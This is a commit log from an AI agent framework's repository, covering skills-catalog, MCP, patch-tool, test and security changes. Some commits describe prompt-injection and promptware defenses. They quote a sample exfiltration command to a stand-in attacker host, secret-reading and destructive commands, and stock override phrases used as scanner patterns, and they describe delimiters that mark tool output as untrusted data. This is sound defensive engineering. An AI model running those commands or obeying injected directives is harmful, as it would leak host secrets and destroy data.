hermes-agent

mirror of https://github.com/NousResearch/hermes-agent.git synced 2026-05-30 06:41:51 +00:00

Author	SHA1	Message	Date
Teknium	7a8589e782	fix(gateway): default media-delivery validation to denylist-only, restore .md delivery (#34022 ) PR #29523 restricted MEDIA: paths and bare local paths in agent output to files under the Hermes media cache or an operator-allowlisted root, with a 10-minute recency window as a fallback. The intent was to defend against prompt-injection-driven exfiltration of host secrets, but in the default single-user setup the asymmetry doesn't earn its keep: we accept any document type the user uploads inbound (.md, .pdf, .txt, .docx, ...) and the agent already has terminal access — anything that can convince it to emit a MEDIA: tag for /etc/passwd can equally convince it to `cat /etc/passwd \| curl attacker.com`. Practical breakage: agents that produced an .md, .pdf, or other artifact more than ~10 minutes ago, or outside the cache allowlist, showed the user a raw filepath in chat instead of the file. Default flipped to denylist-only: • /etc, /proc, /sys, /dev, /root, /boot, /var/{log,lib,run} • $HOME/{.ssh,.aws,.gnupg,.kube,.docker,.config,.azure,.gcloud} • macOS Library/Keychains • $HERMES_HOME/{.env, auth.json, credentials} The legacy allowlist+recency-window behavior stays available via opt-in: `gateway.strict: true` in config.yaml (or `HERMES_MEDIA_DELIVERY_STRICT=1`). Recommended for public-facing bots where prompt injection from one user shouldn't be able to exfiltrate the host's secrets to that same user. • `gateway/platforms/base.py` — `validate_media_delivery_path()` short-circuits to "return resolved if not under denylist" when strict is off. Strict mode preserves the original cache-then- allowlist-then-recency logic. New `_media_delivery_strict_mode()` reader for `HERMES_MEDIA_DELIVERY_STRICT`. • `hermes_cli/config.py` — `gateway.strict: false` added to DEFAULT_CONFIG; existing keys documented as "only consulted in strict mode." No `_config_version` bump needed (deep-merge picks up the new default for old installs). 
• `gateway/run.py` — bridges `gateway.strict` → `HERMES_MEDIA_DELIVERY_STRICT` at startup. • `tools/send_message_tool.py` — schema description broadened back to plain "any local path." • Tests — existing strict-path tests pinned to STRICT=1 so they keep exercising the legacy behavior; new `TestMediaDeliveryDefaultMode` with 8 cases covering the public default (stale .md accepted, any extension delivers, credential paths still blocked, strict env-var aliases, filter E2E). Validation: - tests/gateway/test_platform_base.py: 119/119 pass - tests/gateway/test_tts_media_routing.py: 7/7 pass - tests/tools/test_send_message_tool.py: 121/121 pass - tests/hermes_cli/test_kanban_notify.py: 12/12 pass - tests/cron/test_scheduler.py: 120/120 pass - E2E via execute_code with real imports: • stale .md outside allowlist → accepted (default) • same path with STRICT=1 → rejected • $HOME/.ssh/id_rsa → rejected (default) • filter_local_delivery_paths([md, key]) → [md] only • gateway.strict in config.yaml → bridged to env (true=1, false=0)	2026-05-28 11:32:36 -07:00
Teknium	7050c052e3	fix(skills): pull full skills.sh catalog via sitemap (858 → 19,932) (#34025 ) The skills.sh source was returning ~858 unique skills from a hardcoded list of 28 popular keyword searches (each capped at 50 results). The real catalog is ~20k — exposed via sitemap-skills-{1,2}.xml linked from the site's sitemap index. Switch the empty-query path in SkillsShSource.search() to walk the sitemap instead of scraping the homepage's curated featured strip. Falls back to the homepage scrape if the sitemap is unreachable. build_skills_index.crawl_skills_sh() now just calls search("", limit=0) instead of running 28 keyword searches — same result in one HTTP round instead of 28. Also handle a httpx + brotlicffi interaction: the per-skill sitemaps are ~900 KB brotli-compressed and the cffi backend's streaming decode chokes on them. Forcing Accept-Encoding to gzip dodges the bug without requiring a brotli library upgrade. E2E against live skills.sh: 19,932 unique skills walked in 0.7s. Tests: 137 pass (+1 new regression test exercising the sitemap path). Floor for skills.sh raised 100 → 10,000 in EXPECTED_FLOORS so a future regression hard-fails the build.	2026-05-28 11:28:12 -07:00
Teknium	5e1f793430	chore(web): remove web_crawl tool + provider crawl plumbing (#33824 ) The web_crawl_tool() function was an orphan — no model schema registered it, no skill or CLI command called it, and the agent had no way to invoke it. PR #32608 proposed wiring it up as a model-callable tool; we've decided not to expose crawl as a separate capability since web_search + web_extract cover the use cases we want models to have. Removed: - tools/web_tools.py: web_crawl_tool() (~230 LOC) - plugins/web/firecrawl/provider.py: supports_crawl() + crawl() - plugins/web/tavily/provider.py: supports_crawl() + crawl() - plugins/web/xai/provider.py: supports_crawl() override - agent/web_search_provider.py: supports_crawl() + crawl() ABC methods - agent/web_search_registry.py: get_active_crawl_provider() + the 'crawl' branch in _resolve() - agent/display.py: web_crawl tool-progress rendering - hermes_cli/config.py: 'web_crawl' from TAVILY_API_KEY.tools - tools/website_policy.py: stale comment reference - Tests: removed TestWebCrawlTavily class, the two website-policy web_crawl tests, the searxng/ddgs/brave-free crawl-error tests, the integration test_web_crawl method, and the test_unconfigured_crawl_emits_top_level_error test. Trimmed the capability-flag parametrize list and the WebSearchProvider ABC conformance tests. - Docs: trimmed the Crawl column from capability tables in both EN and zh-Hans, updated the developer-guide ABC table. Net: 25 files, +115/-1067. Closes #33762 (the schema-text bug only existed if #32608 landed). Supersedes #32608.	2026-05-28 04:52:42 -07:00
teknium1	78be458608	fix(patch): widen new_string \t/\r unescape to all match strategies (#33733 ) Extends @liuhao1024's escape-normalized fix so the patch tool also recovers when old_string carries a real tab byte and matches via the `exact` strategy — which is the headline reproduction in the issue and the most common case in practice (LLMs frequently get old_string right because they re-read the file, but still serialize new_string's tabs as two-character `\t`). Instead of gating on the match strategy, decide per-sequence by looking at the matched region of the file: only convert `\t` -> tab and `\r` -> CR when the file region we're replacing actually contains the corresponding control byte. That mirrors the region-based heuristic in `_detect_escape_drift` and keeps legitimate writes of the literal two-character string `"\t"` (e.g. patching `sep = "\t"` in Python source) untouched — those files have a backslash+t in the matched region, not a real tab, so new_string passes through verbatim. `\n` is still excluded because newlines serialize correctly through JSON and unescaping would corrupt source escape sequences far more often than help. E2E verified against the live `patch` tool: tab-indented file + literal `\t` in new_string under both `exact` (Variant 1) and `escape_normalized` (Variant 2) strategies now produces real tab bytes; a Python source line containing `sep = "\t"` (legitimate literal backslash-t) survives a patch unchanged. Tests updated to cover both strategies and the legitimate-literal case, and to assert that `\n` is intentionally preserved. Refs #33733	2026-05-28 03:27:20 -07:00
liuhao1024	e9f3f2b34a	fix(tools): unescape common sequences in new_string when escape_normalized matches When the patch tool matches via the escape_normalized strategy, old_string contains literal \t, \n, \r sequences that get unescaped to match real control characters in the file. However, new_string was written as-is, leaving literal backslash sequences in the output. Add _unescape_common_sequences() helper and apply it to new_string when the matching strategy is escape_normalized. This ensures LLM-generated tab/newline sequences become real bytes in the patched file. Fixes #33733	2026-05-28 03:27:20 -07:00
Dusk1e	a91b1c8b31	fix(tirith): reject non-regular tar members during auto-install process	2026-05-28 02:49:26 -07:00
Teknium	fb9f3a4ef9	fix(skills): pull full ClawHub catalog into the skills index (200 → 20k+) (#33748 ) * fix(skills): pull full ClawHub catalog into the skills index The website was showing 200 ClawHub skills out of 20k+ because `ClawHubSource.search("")` for empty queries went straight to a single unpaginated request. ClawHub's API caps any single page at 200 items and returns a `nextCursor`; we grabbed page 1 and stopped, so the cached index served from hermes-agent.nousresearch.com had a silent 99% truncation. End users never hit clawhub.ai directly (the index is rebuilt twice daily by .github/workflows/skills-index.yml and served as a static JSON on the docs site), so the cap-and-cache architecture is correct — it just wasn't being filled. Changes: - `ClawHubSource.search(query="")` now routes through the existing `_load_catalog_index()` paginating walker instead of the unpaginated listing fallback (non-empty queries still hit the fast catalog search). - `_load_catalog_index()` max_pages 50 → 250 (50k-skill ceiling; live catalog is ~20k as of May 2026, with headroom for growth). - `build_skills_index.py`: per-source crawl limits split out — ClawHub and LobeHub get 100k, others keep their effective caps. - `EXPECTED_FLOORS["clawhub"]` 50 → 5000 so the next pagination regression hard-fails the CI build instead of silently shipping a degenerate index. Test plan: - New unit test `test_search_empty_query_paginates_full_catalog` exercises the cursor-following path with three mocked pages (450 total items) and asserts all pages are walked. - Existing 9 ClawHub tests + 127 broader skills_hub tests all pass. - E2E against live ClawHub API: walker reached 9700+ skills across 49 pages before this commit landed, paginating well past the previous 50-page cap. * fix(skills): raise ClawHub ceilings — live catalog is 50k, not 20k E2E walk against live ClawHub API hit my initial 250-page cap at 49,698 skills with cursor=yes still pending. 
The catalog is roughly 2.5x larger than the docstring estimate. - max_pages 250 → 750 (150k ceiling, walks terminate on cursor=None well before this in practice) - SOURCE_LIMITS['clawhub'] 100k → 200k - EXPECTED_FLOORS['clawhub'] 5000 → 20000	2026-05-28 01:42:19 -07:00
Teknium	87e5b2fae0	feat(mcp): support TLS client certificates (mTLS) for HTTP and SSE servers (#33721 ) Adds first-class `client_cert` / `client_key` config keys so MCP servers behind mTLS work without an external TLS-terminating proxy. Resolves inbound community question (Jeremy W.). Schema (per `mcp_servers.<name>`, HTTP/SSE only): - `client_cert: "/path/to/combined.pem"` — single PEM with cert + key - `client_cert: "/path/to/cert"` + `client_key: "/path/to/key"` — separate - `client_cert: [cert, key]` or `[cert, key, password]` — list form, with optional passphrase for encrypted keys Paths support `~` expansion. Missing files raise a server-scoped `FileNotFoundError` at connect time rather than failing later with an opaque TLS handshake error. Wiring: - New SDK HTTP path (mcp >= 1.24): `cert=` on the user-owned `httpx.AsyncClient` alongside the existing `verify=` handling. - SSE path: routed through an `httpx_client_factory` that wraps the SDK's defaults (follow_redirects=True) and layers `verify` + `cert` on top. The factory is only injected when needed, so the SDK's built-in `create_mcp_http_client` keeps being used in the default case. - Deprecated mcp<1.24 path left untouched — that SDK's `streamablehttp_client` signature doesn't expose `cert`, and adding it would be dead code. Also documents the previously-undocumented `ssl_verify` key (bool or CA bundle path) in the MCP config reference. Tests: - `tests/tools/test_mcp_client_cert.py` (new, 19 tests): - `_resolve_client_cert` helper: all three input forms, `~` expansion, missing-file and validation errors. - HTTP transport: `cert=` forwarded into `httpx.AsyncClient` for string and tuple forms; absent when unset; missing-file error propagates. - SSE transport: factory only injected when cert or non-default verify is set; factory applies cert, custom CA bundle, and preserves `follow_redirects=True` + forwarded headers/auth. 
- Existing tests: 200/200 in `test_mcp_tool.py` + `test_mcp_sse_transport.py` still pass.	2026-05-28 00:55:55 -07:00
Robin Fernandes	dc52b82d53	test(auth): update entitlement CI expectations	2026-05-28 00:19:31 -07:00
Robin Fernandes	1cf5e639b3	fix(auth): refresh Nous entitlement in tool menus	2026-05-28 00:19:31 -07:00
Robin Fernandes	406901b27d	feat(auth) normalise the way in which we check whether a user has free/paid access to nous portal so we can expose behaviour and error messages accordingly.	2026-05-28 00:19:31 -07:00
Teknium	4e702fe2d9	test(ci): harden two flaky tests against CI noise (#33675) Two unrelated transient failures on PR #33661's initial CI run, both pre-existing on main and recovered on rerun. Hardening: 1. tests/cron/test_scheduler.py::TestRunJobConfigLogging — added mocks for resolve_runtime_provider() and discover_mcp_tools(). The yaml-warning tests intend to exercise only the warning-log path, but _run_job_impl continues into provider resolution and MCP discovery after the warning. Both can spawn subprocesses / hit the network and pushed the test over its 30s budget under GHA load. 2. 
tests/tools/test_browser_supervisor.py — wrapped Chrome teardown against the stdlib subprocess._wait() race (bpo-38630). When SIGCHLD arrives during proc.wait(), _try_wait(WNOHANG) can return a foreign pid and the 'assert pid == self.pid or pid == 0' fires. Fixture now catches AssertionError/TimeoutExpired, force-kills, and always reaps so no zombie escapes. Same hardening applied to the early-skip branch.	2026-05-27 23:15:41 -07:00
teknium1	36c99af37a	test(kanban): align two tests with recent kanban hardening Two pre-existing test failures on main, both pointing at code that was hardened recently — not behaviour bugs, test expectations that fell out of date. 1. tests/tools/test_kanban_tools.py::test_worker_complete_rejects_stale_run_id `c002668ff` ("fix(kanban): add grace period to detect_crashed_workers") gates each running task behind a launch-window grace period so freshly-spawned workers whose PID isn't yet visible on /proc don't get reclaimed. The test creates a worker_env fixture moments before asserting reclamation, so the default 30s grace skips the liveness check and detect_crashed_workers returns []. Fix: set HERMES_KANBAN_CRASH_GRACE_SECONDS=0 in the test so we get the immediate-reclaim semantics the assertion expects. 2. tests/tools/test_windows_native_support.py:: TestKanbanWaitpidWindowsGuard::test_source_gates_waitpid_loop `ffdc937c1` ("fix(kanban): hoist zombie reaper out of dispatch_once") reshaped reap_worker_zombies to use an early-return Windows guard (\`if os.name == "nt": return []\`) instead of an inverted gate (\`if os.name != "nt":\`). Both correctly keep the waitpid loop off Windows — the early-return form is stronger because the rest of the function never runs. Fix: accept either gate pattern in the source scan. Both failures reproduce verbatim on \`origin/main\` in a clean env; neither relates to in-flight work on #33564 (the FD-leak fix). Filing this as a separate fix-it PR per green-CI-policy so the kanban CI shard stays green for downstream PRs.	2026-05-27 18:26:44 -07:00
wysie	f040710d04	fix: backfill official optional skill provenance	2026-05-27 13:39:58 -07:00
wysie	a38e283395	fix: preserve nested official skill install paths	2026-05-27 13:39:58 -07:00
Teknium	187cf0f257	tools(terminal): nudge homebrewed CI pollers at the tool surface (#33142 ) Background processes whose command contains `gh pr view --json statusCheckRollup` or `gh pr checks \| jq` now get a runtime hint in the result pointing at the canonical green-ci-policy snippets. The homebrew shape has caused at least seven silent CI-watcher failures in the past two weeks (#31329, #31448, #31695, #31709, #31745, #32264, #33131) — each one a different jq/awk/grep variation of the same fundamental problem (stdout buffering, jq null-key edge cases, conclusion-vs-status confusion, TTY-only banner grepping). The skill that documents this anti-pattern is excellent, but a skill only fires if the agent loads it. The tool surface fires on every misuse. This is the embed-footguns-in-tool-surface pattern from PR #31289 applied to a recurring failure mode that's outgrown skill-only enforcement. Detector is deliberately narrow — flags two specific shapes: 1. Any command containing `statusCheckRollup` (the JSON-API path — conclusion vs status field semantics keep burning us). 2. `gh pr view` / `gh pr checks` combined with `jq` (gh pr checks doesn't emit JSON, so any `\| jq` here is confused intent; the canonical column-2 poller uses awk-on-tabs, not jq). Does NOT flag the blessed column-2 awk-on-tabs poller (which uses `awk -F"\t" "\==\"pending\""`) or the exit-code-driven `gh pr checks $PR >/dev/null` snippet. Hint composes with the existing background-without-notify_on_complete hint — both can fire on the same call. Each is independently actionable. 
Tests: - 4 new cases in tests/tools/test_notify_on_complete.py - test_homebrew_ci_poller_via_statusCheckRollup_emits_hint (positive) - test_homebrew_ci_poller_via_gh_pr_checks_piped_to_jq_emits_hint (positive) - test_canonical_column2_awk_poller_does_not_emit_homebrew_hint (negative) - test_canonical_gh_pr_checks_exit_code_loop_does_not_emit_hint (negative) - test_non_ci_background_command_does_not_emit_homebrew_hint (negative) - 30/30 passing (was 26)	2026-05-27 02:22:08 -07:00
Teknium	febc4cfec0	remove Vercel AI Gateway and Vercel Sandbox (#33067 ) * remove Vercel AI Gateway provider and Vercel Sandbox terminal backend Both Vercel-hosted integrations are removed end-to-end. Users on the AI Gateway should switch to OpenRouter or one of the other aggregators (Nous Portal, Kilo Code). Users on the Vercel Sandbox backend should switch to Docker, Modal, Daytona, or SSH. What's removed: - `plugins/model-providers/ai-gateway/` provider plugin - `hermes_cli/vercel_auth.py` Vercel-Sandbox auth helper - `tools/environments/vercel_sandbox.py` terminal backend - `ai-gateway` provider wiring across auth, doctor, setup, models, config, status, providers, main, web_server, model_normalize, dump - `vercel_sandbox` backend wiring across terminal_tool, file_tools, code_execution_tool, file_operations, approval, skills_tool, environments/local, credential_files, lazy_deps, prompt_builder, cli, gateway/run - `AI_GATEWAY_BASE_URL` constant, `_AI_GATEWAY_HEADERS` auxiliary-client header set, run_agent base-URL header/reasoning special-cases - `[vercel]` pyproject extra and `vercel`/`vercel-workers` from uv.lock - env vars: `AI_GATEWAY_API_KEY`, `AI_GATEWAY_BASE_URL`, `VERCEL_TOKEN`, `VERCEL_PROJECT_ID`, `VERCEL_TEAM_ID`, `VERCEL_OIDC_TOKEN`, `TERMINAL_VERCEL_RUNTIME` - Tests: deletes test_ai_gateway_models.py and test_vercel_sandbox_environment.py; scrubs references across 23 surviving test files (no entire tests deleted unless they were dedicated to AI Gateway / Sandbox) - Docs: provider tables, env-var reference, setup guides, security notes, tool config, terminal-backend tables — English plus zh-Hans i18n parity - `hermes-agent` skill: provider table entry and remote-backend list What stays (intentional): - `popular-web-designs/templates/vercel.md` — CSS design reference, unrelated to Vercel-the-AI-product - `x-vercel-id` in `stream_diag.py` headers — generic Vercel CDN response header, useful diag signal on any Vercel-hosted endpoint - 
`vercel-labs/agent-browser` URL in browser config — lightpanda browser project, different OSS effort - `userStories.json` historical contributor entry mentioning Vercel Sandbox — archive, not active docs Validation: - 1153 tests in the 22 targeted files pass (`scripts/run_tests.sh`) - Full repo `py_compile` clean - Live import of every touched module + invariant check (no `ai-gateway` in `PROVIDER_REGISTRY`, no `_AI_GATEWAY_HEADERS`, no `vercel_sandbox` in `_REMOTE_TERMINAL_BACKENDS`) * test: convert profile-count check from change-detector to invariant The hardcoded "== 34" assertion broke when ai-gateway was removed. Per AGENTS.md change-detector-test guidance, assert the relationship (registry count >= number of plugin dirs) instead of a literal count. Counts shift when providers are added/removed; that's expected.	2026-05-27 00:43:32 -07:00
Ben Barclay	81a4f280d2	Merge pull request #22534 from wesleysimplicio/fix/voice-mode-docker-respect-pulse-pipewire fix(voice): honor PULSE_SERVER/PIPEWIRE_REMOTE inside Docker (#21203)	2026-05-27 13:59:12 +10:00
MorAlekss	c26af46811	fix(skills): reject symlinks in skill bundles before install	2026-05-25 18:33:02 -07:00
Teknium	ccd899318e	fix(cron): split scanner into two tiers so skill prose stops false-positiving (#32339 ) The runtime cron prompt scanner (added in #3968 to plug the "malicious skill carrying an injection payload" gap) reuses the same critical-severity patterns as the create-time user-prompt scan against the assembled prompt — which includes loaded skill markdown. That works fine for narrow patterns like "ignore previous instructions" which never legitimately appear in prose. It catastrophically false- positives on command-shape patterns like `cat ~/.hermes/.env`, `authorized_keys`, `/etc/sudoers`, and `rm -rf /`, which routinely appear in security postmortems and runbooks as descriptive prose about attacks, not as actual commands. Concrete failure: the bundled `hermes-agent-dev` skill contains a security postmortem section saying "the attacker could just `cat ~/.hermes/.env`". Every PR-scout cron job that loaded this skill was silently blocked with `Blocked: prompt matches threat pattern 'read_secrets'`. All 11 scout jobs failed for weeks. Fix: split the scanner into two tiers and route by context: - `_scan_cron_prompt` (strict, unchanged behavior) runs against the small user-authored cron prompt at create/update and as a runtime defense-in-depth when no skills are attached. A legit user prompt has no business saying `cat .env`, so the strict patterns still apply there. - `_scan_cron_skill_assembled` (new, looser) runs against the assembled prompt when skills are attached. It only catches unambiguous prompt-injection directives ("ignore previous instructions", "disregard your rules", "system prompt override", "do not tell the user") plus invisible-unicode markers. Command- shape patterns are dropped because they false-positive on prose. This is defense-in-depth, not the only line of defense. 
Skill bodies are already scanned at install time by `skills_guard.py`; the runtime cron scan exists purely as a tripwire for an obvious injection directive surviving a malicious install. Catching prose mentions of commands was never the goal of #3968 — the test that planted a skill containing `cat ~/.hermes/.env` was the wrong shape of test for the threat model. Tests: - `_scan_cron_prompt` strict behavior preserved (56 existing tests unchanged: bare `cat .env`, `rm -rf /`, etc. still block). - New `TestScanCronSkillAssembled` class verifies the looser scanner: injection / disregard / system-override / do-not-tell-the-user / invisible-unicode still block; descriptive prose about attack commands is allowed; GitHub auth-header allowlist still works. - `test_skill_with_env_exfil_payload_raises` (planted `cat .env` in skill body) replaced with `test_skill_with_env_exfil_command _in_prose_is_allowed` documenting the new correct behavior with the real-world postmortem-style example that triggered the bug. - All 11 originally-failing PR-scout jobs validated end-to-end via `_build_job_prompt` — assembled prompts now build successfully with the `hermes-agent-dev` skill attached. Total: 75/75 tests in cron + cronjob_tools + threat scanner pass; 544/544 across the wider cron / memory / threat-pattern surface.	2026-05-25 18:20:45 -07:00
Teknium	6bd0be30be	feat(patch): indentation preservation, CRLF preservation, per-file failure escalation (#507 ) (#32273 ) Three granular patch-tool refinements from the Roo Code deep-dive (#507). ## Indentation preservation (fuzzy_match.py) When fuzzy_find_and_replace matches via a non-exact strategy, the file's indentation may differ from what the LLM sent in old_string/new_string (common case: model sends zero-indent old/new for a method body that lives inside an 8-space-indented class). Before this commit the replacement was spliced in verbatim, producing a file with a broken indent level that may still parse but is logically wrong. The fix computes the indent delta between old_string's first meaningful line and the matched region's first meaningful line, then re-indents every line of new_string by that delta. Exact-strategy matches are untouched (passthrough). Same approach as Roo Code's multi-search-replace.ts:466-500. ## CRLF preservation (file_operations.py) Models nearly always send tool args with bare LF endings (JSON-encoded), but the file on disk may have CRLF (Windows-line-ending configs, .bat, .cmd, .ini files). Before this commit: - write_file silently normalized CRLF to LF on every overwrite - patch produced mixed-ending files: the substituted region had LF, the surrounding context kept CRLF The fix detects the file's existing line endings (via pre_content if already read for lint/LSP, otherwise a tiny head -c 4096 probe), and normalizes the entire write to that ending. New files are written verbatim (no detection possible). ## Per-file failure escalation (file_tools.py) When the agent fails to patch the same file 3+ times in a row, the existing 'old_string not found' hint isn't strong enough — the model keeps retrying with variations against a stale view of the file. The fix tracks consecutive failures per (task_id, resolved_path) and injects an escalating hint after 3 failures: 'This is failure #N patching X. Stop retrying. 
Either re-read fresh, use longer context, or fall back to write_file.' Counter resets on a successful patch to the same path. ## Validation - 22 new tests across tests/tools/test_fuzzy_match.py (5), test_line_ending_preservation.py (12), test_patch_failure_tracking.py (5) - All existing tests pass (165/165 in the touched files) - E2E verified with real _handle_patch / _handle_write_file calls against real CRLF files and real failure loops Closes part of #507. The remaining open items in #507 (2b start_line hint, behavioral rules) were declined after audit: - 2b adds schema bloat for a problem the existing 'multiple matches' contract already handles - Behavioral rules conflict with the personality system Items 1, 2d, 2e, 3, 4 of #507 were already landed in earlier work.	2026-05-25 15:18:45 -07:00
Teknium	0dee92df22	feat(security): promptware defense — shared threat patterns + memory load-time scan + tool-result delimiters (#32269 ) Hardens the context window against Brainworm-class promptware attacks (see #496). Three changes: 1. tools/threat_patterns.py — single source of truth for injection/promptware patterns. Replaces the duplicated pattern lists in prompt_builder.py and memory_tool.py. Adds ~15 new Brainworm/C2 patterns (node registration, heartbeat/beacon, pull tasking, anti-forensic disk avoidance, identity override, known framework names). Three scopes — 'all' (narrow, classic injection), 'context' (adds promptware/role-play, broader detection), 'strict' (adds persistence/SSH-backdoor patterns for user-mediated writes). 2. MemoryStore.load_from_disk() now scans entries at snapshot-build time. Poisoned entries are replaced with [BLOCKED: ...] placeholders in the frozen system-prompt snapshot. Live state keeps the original so the user can still inspect + remove via memory(action=read/remove). Scan is deterministic from disk bytes — prefix-cache invariant holds. 3. make_tool_result_message() wraps results from high-risk tools (web_extract, web_search, browser_, mcp_) in <untrusted_tool_result source="...">...</untrusted_tool_result> delimiters with framing prose telling the model the content is data, not instructions. Architectural defense against indirect injection from poisoned web pages, GitHub issues, MCP responses — does NOT regex-scan tool results (pattern arms race + per-iteration latency). Multimodal content lists pass through unwrapped to preserve adapter compatibility. Pattern philosophy: anchor on C2-specific vocabulary or unambiguous attack behavior, NOT on bossy English. Dropped patterns suggested in #496 that would have tripped legitimate content: standalone 'you are obligated to', 'do not respond immediately', 'you must X' without a C2-verb anchor. 
Validation: - 257/257 targeted tests pass (test_threat_patterns + test_memory_tool + test_tool_dispatch_helpers + test_prompt_builder) - E2E run with real Brainworm payload: blocked from AGENTS.md context-file path, blocked from MEMORY.md snapshot, wrapped in delimiters when arriving via web_extract. Legitimate 'you must follow conventions' phrasing not flagged. Explicitly NOT in this PR (per #496 discussion): - Per-tool-result regex scanning (pattern arms race) - SessionBehaviorMonitor / polling-loop detection (wrong layer) - Outbound network gating (Docker backend already covers this) - security.context_scanning warn|block knob (current behavior is always block-with-placeholder — there's no warn mode that makes sense) Closes #496 for Phase 1 + the architectural delimiter piece of Phase 2. Phase 3 stays in tracking issue territory.	2026-05-25 14:52:24 -07:00
Teknium	5caeb65a08	test(tts): regression coverage for #29417 double-[pause] fix Three new tests in tests/tools/test_tts_xai_speech_tags.py: - multi_paragraph_emits_single_pause — the headline #29417 case. Requires a first sentence of 12+ chars to hit the _XAI_FIRST_SENTENCE_RE length floor; the trivial 'Hello.\\n\\nWorld.' case dodged the bug by accident, which is why the PR's quoted repro didn't reproduce. Uses the longer 'Welcome to the demo of our new product line.\\n\\nIt has many features.' shape that actually trips the bug. - single_paragraph_still_gets_first_sentence_pause — sanity guard that the fix only suppresses the first-sentence pass when a paragraph pass injected [pause], so plain single-paragraph input still gets its leading pause. - single_newline_still_gets_first_sentence_pause — single newline isn't a paragraph break, no [pause] from the paragraph pass, so the first-sentence pause MUST still fire. Catches over-broad fixes.	2026-05-25 14:30:06 -07:00
Teknium	0a6a0ba527	test(skills): widen assertion in PR#6656 regression to accept new validator msg The new install-path validator from this PR raises 'Unsafe install path: ...' earlier in the pipeline than the previous resolve-then-check path. Behavior is identical (ok=False, victim untouched, refused before rmtree) — only the error string changed.	2026-05-25 06:13:36 -07:00
峯岸亮	3b9b9a7ad7	fix(skills): guard uninstall lock paths Validate Skills Hub lock-file install paths at both ends of the lifecycle so a poisoned or malformed lock.json entry cannot drive shutil.rmtree to a location outside SKILLS_DIR: - HubLockFile.record_install rejects empty/'.'/absolute/traversal/ Windows-drive paths at write time, and requires the final path component to match the skill name (shape: '<skill>' or '<category>/<skill>'). - install_from_quarantine resolves its destination through the same validator, catching symlink/junction redirects inside skills/. - uninstall_skill resolves the lock entry through the new validator before rmtree. Refuses anything that resolves to SKILLS_DIR itself (empty/dot paths) or to a target outside SKILLS_DIR (absolute paths, traversal, symlinked dirs in skills/ pointing outward). - 14 focused regression tests covering each rejection class plus a symlink-redirect case. E2E verified: hand-crafted poisoned lock.json entries (absolute path, empty install_path, traversal) all refuse and leave the targeted victim untouched; legitimate uninstall still succeeds. Co-authored-by: Teknium <127238744+teknium1@users.noreply.github.com>	2026-05-25 06:13:36 -07:00
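The write-time rejection rules listed in the commit above (empty, '.', absolute, traversal, Windows-drive, and a final component that must match the skill name) could be expressed along these lines. `validate_install_path` is a hypothetical name, and the sketch covers only the string-shape checks; the symlink and junction resolution against SKILLS_DIR that the commit also mentions is not modeled here.

```python
import re
from pathlib import PurePosixPath

_WINDOWS_DRIVE = re.compile(r"^[A-Za-z]:")


def validate_install_path(install_path, skill_name):
    """Return a normalized relative path, or raise ValueError if it looks unsafe."""
    raw = (install_path or "").strip().replace("\\", "/")
    if raw in ("", "."):
        raise ValueError(f"Unsafe install path: {install_path!r}")
    if raw.startswith("/") or _WINDOWS_DRIVE.match(raw):
        raise ValueError(f"Unsafe install path: {install_path!r}")
    parts = PurePosixPath(raw).parts
    if ".." in parts:
        raise ValueError(f"Unsafe install path: {install_path!r}")
    # Accepted shapes: '<skill>' or '<category>/<skill>'.
    if not parts or len(parts) > 2 or parts[-1] != skill_name:
        raise ValueError(f"Unsafe install path: {install_path!r}")
    return "/".join(parts)
```

A caller would run this before recording an install and again before any `shutil.rmtree`, so a poisoned lock entry fails closed at both ends.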
Teknium	46c1ae8b24	fix(tests): four pre-existing flakes from the security cluster merge (#32072 ) All four failures were broken by the security cluster (#10082 / #10133 / #4609 / symlink-reject batch) merging on May 25. They were red on origin/main HEAD when #32042 and #32061 ran, gating PRs that touched unrelated code. 1) tests/hermes_cli/test_update_zip_symlink_reject.py test_update_via_zip_accepts_normal_member called the real _update_via_zip without sandboxing PROJECT_ROOT — so the function's shutil.copytree() actually copied the fake README from the test ZIP over the real repo's README.md, which then made test_readme_mentions_powershell_installer fail in any test run that happened to pick this test up earlier. Mock PROJECT_ROOT to an isolated tmp_path / install_dir, stub subprocess so pip/uv reinstall doesn't actually run, and assert the fake README lands in the sandbox (not the real tree). 2) tests/tools/test_windows_native_support.py test_readme_mentions_powershell_installer was the victim of (1) — nothing wrong with the test itself, the fix in (1) clears it. 3) tests/tools/test_file_read_guards.py test_proc_fd_other_not_blocked called _is_blocked_device('/proc/self/fd/3') expecting False. But _is_blocked_device runs realpath() and on pytest xdist workers fd 3 happens to be dup'd to /dev/urandom (because the worker subprocess inherits open fds from pytest's collection pipe machinery). Switch to the lower-level _is_blocked_device_path which is the path-pattern check the test actually means to exercise; realpath-resolution coverage already lives in test_symlink_to_blocked_device_is_blocked. 4) tests/tools/test_transcription_tools.py Module installed a faster_whisper stub via sys.modules without setting __spec__, then later @pytest.mark.skipif called importlib.util.find_spec('faster_whisper') which raises 'ValueError: __spec__ is None' for modules with a None spec attr. Set __spec__ on the stub to a real ModuleSpec. 
Validation: 195/195 green across the 4 affected files.	2026-05-25 05:50:29 -07:00
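Item 4 of the commit above turns on a detail of `importlib.util.find_spec`: for a name already present in `sys.modules`, it raises `ValueError` when the module's `__spec__` is `None`. A small sketch of a stub installer that avoids this is shown below; `install_stub` and the module names used with it are illustrative, not taken from the test file.

```python
import importlib.machinery
import importlib.util
import sys
import types


def install_stub(name):
    """Register an empty stand-in module that find_spec() can inspect safely."""
    stub = types.ModuleType(name)
    # A bare ModuleType has __spec__ = None; give it a real ModuleSpec instead.
    stub.__spec__ = importlib.machinery.ModuleSpec(name, loader=None)
    sys.modules[name] = stub
    return stub
```

With the spec set, a later `pytest.mark.skipif(importlib.util.find_spec(name) is None, ...)` style check evaluates without raising.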
Teknium	8191f663dd	feat(mcp-oauth): accept 'skip' at paste prompt to bypass auth without disabling server (#32069 ) When an MCP server triggers OAuth at startup, the user can now type 'skip' (or 'cancel', 's', 'n', 'no', 'q', 'quit') at the paste prompt + Enter to exit the flow cleanly and continue agent startup without that server. Previously the only ways to bypass an unwanted OAuth prompt were: - Wait the full 5-minute paste timeout - Ctrl+C (also kills the whole reload, may leave half-state) - Edit config.yaml to set 'enabled: false' on the server Skip writes a sentinel to result['error'] which _wait_for_callback maps to OAuthNonInteractiveError('user_skipped'). mcp_tool already classifies that as an auth error in _is_auth_error() and the reconnect loop logs it as 'not retrying automatically' — server stays disconnected for the session, other MCP servers continue normally, no infinite retry burn. The skip message tells users how to re-auth later ('hermes mcp login') or disable persistently ('enabled: false'), so they don't have to remember. 14 new tests covering: case-insensitive skip parsing, all 7 skip tokens, skip not stomping an HTTP-listener win, skip routed to skip path rather than URL-parse path, sentinel mapped to OAuthNonInteractiveError, prompt mentions the skip option.	2026-05-25 05:37:30 -07:00
